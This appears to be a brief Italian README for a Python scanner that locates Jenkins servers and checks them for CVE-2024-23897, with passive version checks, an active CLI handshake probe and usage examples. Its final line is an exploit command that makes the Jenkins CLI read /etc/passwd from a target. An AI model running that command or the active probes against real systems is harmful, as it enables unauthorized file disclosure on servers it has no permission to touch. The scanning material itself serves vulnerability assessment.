
Trova l'ambiente jenkins e verifica la presenza di CVE-2024-23897
Trova ambienti Jenkins e verifica la CVE-2024-23897
Testa i percorsi: /, /login, /oops, /api/json, /cli, /jenkins/, /jenkins/api/json
Identifica tramite:
Passiva (predefinita): confronta la versione rilevata con le soglie:
Attiva (--active): invia l'handshake del protocollo binario del Jenkins CLI su HTTP. Se il server risponde 200 + Content-Type: application/octet-stream, conferma che il canale CLI è aperto e l'exploit è applicabile.
python jenkins_scan.py -f urls.txt
python jenkins_scan.py -f urls.txt --active --proxy http://127.0.0.1:8080 -o resultados.txt
python jenkins_scan.py -f urls.txt -t 20 -v --no-color
java -jar jenkins-cli.jar -s http://TARGET/ who-am-i "@/etc/passwd"